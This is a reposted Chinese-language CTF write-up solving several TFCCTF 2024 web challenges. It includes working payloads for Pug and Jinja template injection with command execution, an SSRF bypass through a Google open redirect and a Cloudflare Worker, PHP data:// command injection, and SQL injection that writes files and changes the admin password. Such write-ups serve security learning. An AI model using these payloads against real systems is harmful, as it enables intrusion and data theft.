0
0

【Web】TFCCTF 2024 部分题解

GREETINGS

打express的SSTI

GitHub - TheWation/NodeJsSSTI: Express app with Pug templates demonstrating SSTI vulnerability and secure implementation for educational purposes.

payload:

/result?username=%23{global.process.mainModule.require('child_process').execSync('cat+f*')}

SURFING

提示打SSRF,但限制死了前缀要是http://google.com/

多了一个/,便不能用@绕过

打google的open redirect

GitHub - krystianbajno/opnredirect.py: 🪝 Google open-redirect vulnerability phishing link generator.

用Cloudflare Worker来起一个临时域名

Cloudflare Workers©

/**
 * @typedef {Object} Env
 */

export default {
    /**
     * @param {Request} request
     * @param {Env} env
     * @param {ExecutionContext} ctx
     * @returns {Promise<Response>}
     */
    async fetch(request, env, ctx) {
        const url = new URL(request.url);
        console.log(`Hello ${navigator.userAgent} at path ${url.pathname}!`);

        // Check if the path matches (you can customize the path condition if needed)
        if (url.pathname === "/") {
            // Redirect to the specified URL with a 302 status code
            return Response.redirect("http://127.0.0.1:8000/admin.php?username=admin&password=admin", 302);
        }
    },
};

生成payload:

成功302打ssrf

SAFE_CONTENT

打命令注入,对内容的控制用data伪协议,isAllowedIP插一个localhost即可绕

<?php
var_dump(parse_url('data://localhost/plain;base64,111'));

$exp = base64_encode(base64_encode("`cat /f* > /var/www/html/1.txt`"));

echo "data://localhost/plain;base64," . $exp;

FLASK DESTROYER

可以实现sql写文件,文件只能新建,不能覆盖

username=admin"%3bselect+'success!'+into+outfile+'/destroyer/app/static/test.html'%3b--%2b&password=123&vibe=y

想着写恶意模板进app/templates目录打SSTI

但未经注册,无法渲染

这时候再审计代码,可以发现当/login路由查表成功,会调strtok去分割数据,再写入User返回

但是因为strtok代码本身存在错误,当传入的string末尾为:时,会传入none进token,继而让internal server error,从而重启服务,这样就可以将事先写入app/templates下的模板文件注册

先写入恶意文件

username=admin";select "{{config.__class__.__init__.__globals__['os'].popen('cat /tmp/*/*/*/*').read()}}" into outfile '/destroyer/app/templates/test.html';--+&password=123&vibe=y

再修改admin密码为123:

username=admin";update user set password = '123:' where username = 'admin';--+&password=123&vibe=y

修改后,再以admin/123:登录,此时服务会报错,刷新即可重启服务

最后以admin" or 1=1# /1登录

访问./exp.html拿到flag

FUNNY

【Web】从TFCCTF-FUNNY浅析PHPCGI命令行注入漏洞利用-CSDN博客

看这个👆

标签: TFCCTF2024 CTF WEB
本文转载自: https://blog.csdn.net/uuzeray/article/details/140907658
版权归原作者 Z3r4y 所有, 如有侵权,请联系我们删除。
登录后发布评论

“【Web】TFCCTF 2024 部分题解”的评论:

还没有评论
关于作者
...
overfit同步小助手
文章同步
相关阅读

249基于java ssm springboot安全生产培训管理系统学习课件(源码+文档+运行视频+讲解视频)

【Linux庖丁解牛】—软件安装&vim!

【花雕学编程】Arduino LVGL 之在不同平台创建相同的用户界面

基于电商大数据的商品推荐系统

UE5.4像素流及前端接入

Unity中接入讯飞语音(实时语音转写)WebAPI(非SDK)

springboot实现获取客户端IP地址

文章导航